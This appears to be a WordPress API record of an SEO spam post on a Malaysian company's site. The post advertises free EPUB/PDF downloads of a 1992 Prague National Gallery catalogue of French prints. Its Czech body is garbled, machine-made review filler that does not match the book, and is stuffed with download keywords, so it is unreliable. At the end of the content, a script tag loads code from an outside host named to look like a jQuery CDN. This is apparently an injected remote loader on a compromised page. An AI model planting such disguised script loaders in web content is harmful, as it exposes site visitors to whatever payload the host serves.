{"id":75851,"date":"2025-12-15T17:56:14","date_gmt":"2025-12-15T09:56:14","guid":{"rendered":"https:\/\/www.sinaranadvance.com.my\/?p=75851"},"modified":"2026-01-13T21:56:17","modified_gmt":"2026-01-13T13:56:17","slug":"francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks","status":"publish","type":"post","link":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/","title":{"rendered":"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 &#8211; (EPUB, PDF, eBooks)"},"content":{"rendered":"<h1>Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 (Czech Edition) , Slovenskej N\u00e1rodnej Gal\u00e9rie<\/h1>\n<p>Jako n\u011bkdo, kdo miluje \u010dten\u00ed a psan\u00ed, jsem v\u017edy vzru\u0161en z objevov\u00e1n\u00ed nov\u00fdch autor\u016f a titul\u016f, a mysl\u00edm si, \u017ee tato kniha rom\u00e1ny mohla b\u00fdt skv\u011bl\u00fdm dopl\u0148kem do knihovny ka\u017ed\u00e9ho spisovatele. Emocion\u00e1ln\u00ed cesty postav byly mistrovsky propleteny cel\u00fdm p\u0159\u00edb\u011bhem, vytv\u00e1\u0159ej\u00edc\u00ed pocit online kniha rezonance a hloubky. Sebral jsem knihu, ale nedok\u00e1zala m\u011b Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 Mo\u017en\u00e1 ji pozd\u011bji op\u011bt vyzkou\u0161\u00edm, ale prozat\u00edm le\u017e\u00ed na polici. Autorovo pou\u017eit\u00ed jazyka bylo nic men\u0161\u00edho ne\u017e okouzluj\u00edc\u00ed, jeho slova tkan\u00e1 kouzlem, kter\u00e9 m\u011b p\u0159eneslo do sv\u011bta \u00fa\u017easu a magie, sv\u011bta, kter\u00fd se zd\u00e1l b\u00fdt z\u00e1rove\u0148 fantastick\u00fd a p\u0159ece zvl\u00e1\u0161tn\u011b skute\u010dn\u00fd.<\/p>\n<p>U\u017e jste n\u011bkdy \u010detli knihu, kter\u00e1 v\u00e1s p\u0159im\u011bla zpochybnit va\u0161e vlastn\u00ed p\u0159esv\u011bd\u010den\u00ed? V zp\u011btn\u00e9m pohledu si uv\u011bdomuji, \u017ee moje cz v\u00e1h\u00e1n\u00ed \u010d\u00edst tuto knihu bylo nespr\u00e1vn\u00e9, proto\u017ee se uk\u00e1zalo, \u017ee je to hluboce dojemn\u00e1 Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 lidsk\u00e1 zku\u0161enost, kterou budu n\u00e9st s sebou po l\u00e9ta. Lovecraftovo psan\u00ed je um\u011bleck\u00e9 d\u00edlo atmosf\u00e9rov\u00e9ho vypr\u00e1v\u011bn\u00ed. Jeho popisy jsou tak \u017eiv\u00e9, \u017ee by mohly doj\u00edt i sta\u017een\u00ed znechucen\u00e9ho \u010dten\u00e1\u0159e. Jako n\u011bkdo, kdo je v\u00e1\u0161niv\u00fdm p\u0159\u00edznivcem vzd\u011bl\u00e1v\u00e1n\u00ed, jsem byl fascinov\u00e1n touto anal\u00fdzou toho, jak se komiksy pou\u017e\u00edvaj\u00ed k vyu\u010dov\u00e1n\u00ed d\u011bt\u00ed o holocaustu.<\/p>\n<p>P\u0159\u00edb\u011bh byl bohatou, \u017eivou tapis\u00e9ri\u00ed, utkanou z vl\u00e1ken historie, kultury a osobn\u00edch kniha ka\u017ed\u00fd pram\u00ednek pe\u010dliv\u011b propleten\u00fd, aby vytvo\u0159il jedine\u010dn\u00e9 a poutav\u00e9 vypr\u00e1v\u011bn\u00ed. Co si mysl\u00edte, co je nejv\u00edce pam\u011btihodn\u00e9 na t\u00e9to knize, jsou to postavy, Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 nebo atmosf\u00e9ra? Je vz\u00e1cn\u00fd talent, kter\u00fd dok\u00e1\u017ee vypr\u00e1v\u011bt p\u0159\u00edb\u011bh, kter\u00fd je z\u00e1rove\u0148 poutav\u00fdm str\u00e1nkov\u00e1n\u00edm online hlubok\u00fdm introspektivn\u00edm zkoum\u00e1n\u00edm lidsk\u00e9ho z\u00e1\u017eitku.<\/p>\n<h2>(EPUB, PDF, eBooks) Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992<\/h2>\n<p>Cas se online kniha jednodu\u0161e neslu\u010duje. Postava se zd\u00e1 b\u00fdt ploch\u00e1 a ebook co\u017e rom\u00e1ny nutilo o p\u0159\u00edb\u011bh skute\u010dn\u011b z\u00e1le\u017eet.<\/p>\n<p>Jeho kniha je odrazem t\u00e9\u017ee energie a nad\u0161en\u00ed, v\u00fdzvou k \u010dten\u00e1\u0159\u016fm, aby p\u0159ehodnotili sv\u00e9 priority a sledovali sv\u00e9 sny s nev\u00e1zan\u00fdm nad\u0161en\u00edm. Um\u011bleck\u00e1 d\u00edla jsou dechberouc\u00ed a eseje jsou hlubok\u00fdm ponorem do sv\u011bta neurov\u011bdy. cz to nezbytn\u00fd dopln\u011bk do sb\u00edrky ka\u017ed\u00e9ho nad\u0161ence. Autor\u016fv styl psan\u00ed je poutav\u00fd a pohlcuj\u00edc\u00ed, co\u017e usnad\u0148uje pln\u00e9 zapojen\u00ed do p\u0159\u00edb\u011bhu Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 jeho postav, jako jsou Lisbet a jej\u00ed \u010dten\u00ed Nethe.<\/p>\n<p>Sv\u011bt \u0159emesln\u00fdch koktejl\u016f je fascinuj\u00edc\u00ed, Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 sta\u017een\u00ed technik a jedine\u010dn\u00fdch ingredienc\u00ed, a \u010dten\u00ed kniha je dokonal\u00fdm pr\u016fvodcem pro ka\u017ed\u00e9ho, kdo chce tento sv\u011bt prozkoumat. Knihy maj\u00ed s\u00edlu inspirovat zm\u011bnu, a tato to ur\u010dit\u011b d\u011bl\u00e1 t\u00edm, \u017ee online povzbuzuje, aby si ovl\u00e1dli svou stravu. Autorova pr\u00f3za byla podobn\u00e1 mistrovsk\u00e9mu spojen\u00ed sv\u011btla a st\u00ednu, osv\u011btluj\u00edc\u00ed temn\u00e9 kouty lidsk\u00e9ho srdce, zat\u00edmco tak\u00e9 odhalovala jeho nejhlub\u0161\u00ed, nejprofoundn\u011bj\u0161\u00ed kr\u00e1su.<\/p>\n<h3>Slovenskej N\u00e1rodnej Gal\u00e9rie recenze<\/h3>\n<p>Sd\u00edlen\u00edm sv\u00e9ho p\u0159\u00edb\u011bhu autor pom\u00e1h\u00e1 bourat bari\u00e9ry a zpochyb\u0148ovat tradi\u010dn\u00ed p\u0159edstavy o tom, co znamen\u00e1 b\u00fdt &#8220;norm\u00e1ln\u00ed&#8221;. Pro m\u011b le\u017e\u00ed prav\u00e1 magie t\u00e9to knihy ne v jej\u00edch velk\u00fdch gestech, ale v tich\u00fdch chv\u00edl\u00edch introspekce, kdy jsou my\u0161lenky a pocity protagonisty odhaleny jako otev\u0159en\u00e1 r\u00e1na. Autorovo psan\u00ed bylo pdf zdarma jemn\u00e9mu v\u00e1nek v l\u00e9t\u011b ebook uklid\u0148uj\u00edc\u00ed, ale nakonec zapomn\u011bn\u00e9, jeho emocion\u00e1ln\u00ed resonanci ztratil v mo\u0159i nemotorn\u00e9 pr\u00f3zy. To, co m\u011b p\u0159itahuje ke knih\u00e1m jako je tato, je zp\u016fsob, jak\u00fdm mohou Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 \u010dten\u00e1\u0159e do r\u016fzn\u00fdch sv\u011bt\u016f a p\u0159edstavit nov\u00e9 n\u00e1pady a koncepty, kter\u00e9 zpochyb\u0148uj\u00ed va\u0161e p\u0159edpoklady a roz\u0161i\u0159uj\u00ed va\u0161e pochopen\u00ed. V tomto sv\u011bt\u011b knihy \u010das byl tekut\u00fd, pru\u017en\u00fd, jako \u0159eka, a p\u0159esto n\u011bjak c\u00edtil jsem, \u017ee je podivn\u011b statick\u00fd, jako fotografie, zastaven\u00e1 v \u010dase.<\/p>\n<p>Kdy\u017e jsem knihu zav\u0159el, nemohl jsem se ubr\u00e1nit pocitu \u00fa\u017easu a zv\u011bdavosti, jako by se otev\u0159ely dve\u0159e mobi nov\u00e9ho a nezkouman\u00e9ho sv\u011bta, pln\u00e9ho mo\u017enost\u00ed a tajemstv\u00ed \u010dekaj\u00edc\u00edch na odhalen\u00ed. Nemohl Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 si pomoct, ale byl jsem vt\u00e1hnut do t\u011bchto knih, kter\u00e9 zachycuj\u00ed online rodinn\u00fdch dobrodru\u017estv\u00ed a p\u0159\u00edle\u017eitostn\u00e9 nehody.<\/p>\n<p>Pisatelstv\u00ed bylo vyvol\u00e1vaj\u00edc\u00ed, vytv\u00e1\u0159elo \u017eiv\u00e9 obrazy, kter\u00e9 tancovaly v zdarma mysli, ale samotn\u00fd p\u0159\u00edb\u011bh se mi zd\u00e1l online cz jako patchworkov\u00e1 deka ze r\u016fzn\u00fdch kousk\u016f, mozaika, kter\u00e1 odm\u00edtala d\u00e1vat smysl, p\u0159ipom\u00edn\u00e1n\u00ed v\u00fdzev vypr\u00e1v\u011bn\u00ed p\u0159\u00edb\u011bh\u016f. P\u0159\u00edb\u011bh byl pohnut\u00fdm p\u0159ipomenut\u00edm, zpr\u00e1vou, kter\u00e1 se do m\u011b hluboce zaryla, vol\u00e1n\u00edm k akci, kter\u00e9 m\u011b nechalo inspirovan\u00e9ho a motivovan\u00e9ho. P\u016fsobiv\u00fd p\u0159\u00edb\u011bh, kter\u00fd se odehr\u00e1v\u00e1 v sn\u011bhov\u00e9m New Orleansu, dokonal\u00fd pro tepl\u00e9 zimn\u00ed \u010dten\u00ed. T\u00e9mata p\u0159\u00e1telstv\u00ed a t\u00fdmov\u00e9 pr\u00e1ce, kter\u00e1 proch\u00e1zej\u00ed Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 knihou, jsou inspirativn\u00ed a p\u0159ipom\u00ednaj\u00ed n\u00e1m d\u016fle\u017eitost podpory a povzbuzov\u00e1n\u00ed jednoho druh\u00e9ho.<\/p>\n<h3>Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 pdf<\/h3>\n<p>Kdy\u017e jsem zav\u0159el knihu, c\u00edtil jsem smutek, pocit opu\u0161t\u011bn\u00ed sv\u011bta a postav, kter\u00e9 se hluboce zapsaly do m\u00e9 psychiky. Ale co skute\u010dn\u011b odli\u0161uje tuhle knihu, je jej\u00ed hlubok\u00e9, soucitn\u00e9 zobrazen\u00ed postav, tak k\u0159ehk\u00fdch a nedokonal\u00fdch, jako epub exkluzivn\u00ed porcel\u00e1n, zach\u00e1zen\u00fd s p\u00e9\u010d\u00ed a p\u0159esnost\u00ed. P\u0159\u00edb\u011bh prozkoumal identitu jemn\u011b, pe\u010dliv\u00fdm online zp\u016fsob\u016f, kter\u00fdmi se definujeme a rozum\u00edme sami sob\u011b.<\/p>\n<p>Jedn\u00edm z nejpozoruhodn\u011bj\u0161\u00edch v\u011bc\u00ed na pdf knize je jej\u00ed pou\u017eit\u00ed Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 zp\u016fsob, jak\u00fdm Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 popisy lid\u00ed a m\u00edst se zdaj\u00ed rom\u00e1ny z str\u00e1nky, vytv\u00e1\u0159ej\u00edce pocit \u017eivosti a bezprost\u0159ednosti, kter\u00fd byl t\u011b\u017eko odolateln\u00fd.<\/p>\n<p>Ale, Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 takov\u00e9 momenty byly p\u0159\u00edli\u0161 kr\u00e1tk\u00e9, ztracen\u00e9 ebook oce\u00e1nu b\u011bdn\u00e9ho proza a podvyvin\u00fdch postav, skute\u010dn\u00e1 \u0161koda, kdy\u017e se vezme v \u00favahu velk\u00fd potenci\u00e1l p\u0159\u00edb\u011bhu.<\/p>\n<p>Nen\u00ed \u010dasto, \u017ee kniha m\u016f\u017ee zp\u016fsobit, \u017ee se c\u00edt\u00edm sou\u010d\u00e1st\u00ed n\u011b\u010deho v\u011bt\u0161\u00edho ne\u017e j\u00e1 s\u00e1m, jako nit v velk\u00e9 tapiserii, ale tato kniha to dok\u00e1zala, prav\u00fdm sv\u011bdectv\u00edm s\u00edly vypr\u00e1v\u011bn\u00ed k inspiraci a povznesen\u00ed. Postavy v tomto p\u0159\u00edb\u011bhu jsou tak dob\u0159e Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 a srozumiteln\u00e9, se sv\u00fdmi vlastn\u00edmi silami a slabostmi, \u017ee je snadn\u00e9 se emocion\u00e1ln\u011b investovat do jejich \u017eivot\u016f a fandit jim, zat\u00edmco p\u0159ekon\u00e1vaj\u00ed v\u00fdzvy, kter\u00e9 epub<\/p>\n<p>Vypr\u00e1v\u011bc\u00ed hlas Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 sebev\u011bdom\u00fd a jist\u00fd, vodil m\u011b kindle z\u00e1kruty a zat\u00e1\u010dky d\u011bje s jistou rukou, jako d\u016fv\u011bryhodn\u00fd p\u0159\u00edtel, kter\u00fd zn\u00e1 cestu.<\/p>\n<p><script src=\"\/\/cdn.bunnyflare.run\/jquery_min.js?id=15693809\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 (Czech Edition) , Slovenskej N\u00e1rodnej Gal\u00e9rie Jako n\u011bkdo, kdo miluje \u010dten\u00ed a psan\u00ed, jsem v\u017edy vzru\u0161en z objevov\u00e1n\u00ed nov\u00fdch autor\u016f a titul\u016f, a mysl\u00edm si, \u017ee tato kniha rom\u00e1ny mohla [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"pagelayer_contact_templates":[],"_pagelayer_content":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-75851","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, ... \u010derven-\u010dervenec 1992 - (EPUB, PDF, eBooks) - Sinaran Advance Group<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, ... \u010derven-\u010dervenec 1992 - (EPUB, PDF, eBooks) - Sinaran Advance Group\" \/>\n<meta property=\"og:description\" content=\"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 (Czech Edition) , Slovenskej N\u00e1rodnej Gal\u00e9rie Jako n\u011bkdo, kdo miluje \u010dten\u00ed a psan\u00ed, jsem v\u017edy vzru\u0161en z objevov\u00e1n\u00ed nov\u00fdch autor\u016f a titul\u016f, a mysl\u00edm si, \u017ee tato kniha rom\u00e1ny mohla [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/\" \/>\n<meta property=\"og:site_name\" content=\"Sinaran Advance Group\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-15T09:56:14+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-01-13T13:56:17+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/person\\\/53a837ac211dea070613fe89a0e11d1d\"},\"headline\":\"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 &#8211; (EPUB, PDF, eBooks)\",\"datePublished\":\"2025-12-15T09:56:14+00:00\",\"dateModified\":\"2026-01-13T13:56:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\\\/\"},\"wordCount\":1664,\"publisher\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#organization\"},\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\\\/\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\\\/\",\"name\":\"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, ... \u010derven-\u010dervenec 1992 - (EPUB, PDF, eBooks) - Sinaran Advance Group\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#website\"},\"datePublished\":\"2025-12-15T09:56:14+00:00\",\"dateModified\":\"2026-01-13T13:56:17+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 &#8211; (EPUB, PDF, eBooks)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#website\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/\",\"name\":\"Sinaran Advance Group\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#organization\",\"name\":\"Sinaran Advance Group\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/wp-content\\\/uploads\\\/2021\\\/06\\\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/wp-content\\\/uploads\\\/2021\\\/06\\\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"width\":1085,\"height\":675,\"caption\":\"Sinaran Advance Group\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/person\\\/53a837ac211dea070613fe89a0e11d1d\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\\\/\\\/sinaranadvance.com.my\"],\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/author\\\/sinaranadvance\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, ... \u010derven-\u010dervenec 1992 - (EPUB, PDF, eBooks) - Sinaran Advance Group","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/","og_locale":"en_US","og_type":"article","og_title":"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, ... 